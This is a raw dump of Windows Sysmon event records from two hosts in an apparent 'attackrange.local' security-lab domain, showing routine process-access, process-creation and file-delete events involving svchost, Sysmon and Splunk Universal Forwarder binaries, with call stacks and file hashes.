09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8D54-6151-127A-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.997{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D54-6151-127A-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.998{69CF5F33-8D54-6151-127A-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B2384C7376FCCECBD74964E95ADF8B,SHA256=FC428AA434E977A9221B77101E230F2DA1C7D0A41C43C2028BD420AA3DBCD529,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D56-6151-A500-00000000FD01}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D56-6151-A500-00000000FD01}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.890{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D56-6151-A500-00000000FD01}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.734{5EBD8912-8D56-6151-A500-00000000FD01}5100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:30.466{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1270D9D03A3339224B7C1B4AD5938B7,SHA256=78A9F0ADD4AB5C0120A9F4484CAB3975D86C0F18993427D4263000DB2AA7B096,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:30.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF6F762CC838CF80F24CED138DA2DBF8,SHA256=B1B59CE68F0B28DC9D385AEE29E4A4D6E1692665BA39A9BFDBE32BD6DFDA54FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.640{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3684EB052BEF81EE223746DDEA09DEE,SHA256=29D4E0C1599BEE63931E024E2A74C3F540954BE169C4E60135E1B5E117CA8291,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.014{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D55-6151-A400-00000000FD01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:30.014{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 